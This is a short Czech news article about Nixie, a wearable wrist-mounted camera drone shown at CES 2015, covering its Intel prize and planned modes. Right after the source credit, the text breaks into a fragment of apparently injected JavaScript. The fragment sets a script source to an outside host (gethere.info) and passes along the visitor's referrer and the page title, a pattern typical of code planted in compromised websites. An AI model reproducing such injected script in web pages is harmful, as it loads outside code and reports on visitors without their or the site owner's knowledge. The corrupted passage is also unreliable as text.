UAV | UAS

CES 2015: Nixie – drone jako nositelná elektronika

V Las Vegas se představil další drone, tentokrát ale patřící do kategorie „Wearables“, tedy nositelné elektroniky či nositelných zařízení.

Nixie absolvoval let na CESu v rámci intelovské předváděčky poté, co prošel velmi rychlým vývojem, který ho ze stádia prototypu posunul až před brány komerční výroby. Samozřejmě tomu hodně napomohla skutečnost, že tým stojící za Nixie, vyhrál minulý rok intelovskou soutěž Make It Wearable, která mu zajistila i 500 000 USD. Nicméně vývojáři stále pracují na zlepšení a dotažení ovládání a režimů jako je bumerang, kdy se přístroj vrátí po určité době k majiteli, následování nebo schopnosti ovládat drone hlasem, tedy vlastně spíše zvukem – drone se na zapískání vrátí.

Prvotní vizualizace konceptu Nixie| foto: Nixie Labs

Prvotní vizualizace konceptu Nixie| foto: Nixie Labs

Nixie je v podstatě malá kamerka, uchycená na qudrokoptéře, která díky ohybným ramenům obepne zápěstí, a tak ji můžete s sebou pohodlně nosit. K náramkovým hodinkám tak přibyl náramkový drone. Nixie je samozřejmě určena hlavně po zábavu, hlavním cílem je pořizovat selfie a zachytit dění okolo vlastníka tohoto „pidiUAV“.
Zdroj: Nixie Labs, Intels.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=‘ + encodeURIComponent(document.referrer) + ‚&default_keyword=‘ + encodeURIComponent(document.title) + “;

Předchozí článek

CES 2015: AirDog - stalker z Kickstarteru

Další článek

CES 2015: Hexo+ - další nosič pro GoPro